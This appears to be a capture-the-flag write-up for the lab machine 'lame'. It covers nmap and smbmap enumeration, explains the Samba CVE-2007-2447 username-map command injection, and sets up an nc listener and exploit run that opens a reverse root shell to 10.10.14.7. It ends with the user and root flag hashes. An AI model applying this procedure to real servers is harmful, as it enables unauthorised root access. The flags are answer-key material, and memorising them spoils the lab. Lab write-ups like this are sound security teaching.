Service overview

Let's run a port scanner against the 10.10.10.3 machine:

$ nmap --privileged -sV -sC -Pn -oN 10.10.10.3 10.10.10.3
PORT    STATE  SERVICE      VERSION
21/tcp  closed ftp
22/tcp  open   ssh          OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp closed netbios-ssn
445/tcp closed microsoft-ds
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The machine runs a Samba server. (This particular scan reports 139/tcp and 445/tcp as closed, but the smbmap run below confirms that SMB on 445 is reachable; a single Nmap pass can misreport port state, so re-check suspicious "closed" results before relying on them.)

Samba

Let's take a closer look at the Samba server.

$ smbmap -H 10.10.10.3
[+] IP: 10.10.10.3:445  Name: 10.10.10.3
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        tmp                                                     READ, WRITE     oh noes!
        opt                                                     NO ACCESS
        IPC$                                                    NO ACCESS       IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$                                                  NO ACCESS       IPC Service (lame server (Samba 3.0.20-Debian))

The old version 3.0.20 is vulnerable to CVE-2007-2447: when "username map script" is configured in smb.conf, Samba passes the username supplied during session setup to that script through the shell without sanitising it, so shell metacharacters in the username are executed as root on the server. The exploit therefore needs no valid credentials, only an SMB session setup with a crafted username. Set up a listener, then run the exploit script (target host and port, then the listener host and port):

python3 -m venv env
source env/bin/activate
pip install pysmb
rlwrap nc -lnvp 1234
python usermap_script.py 10.10.10.3 445 10.10.14.7 1234

Flags

root@lame:/home/makis# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
    link/ether 00:50:56:b9:0d:c3 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.3/24 brd 10.10.10.255 scope global eth0
    inet6 dead:beef::250:56ff:feb9:dc3/64 scope global dynamic
       valid_lft 85851sec preferred_lft 13851sec
    inet6 fe80::250:56ff:feb9:dc3/64 scope link
       valid_lft forever preferred_lft forever
root@lame:/home/makis# cat user.txt
38140ce7de697c5a0c0ff4d399bf9c0f
root@lame:/root# cat root.txt
fdf9cd300806c6f046c6f9a1d9dbce3e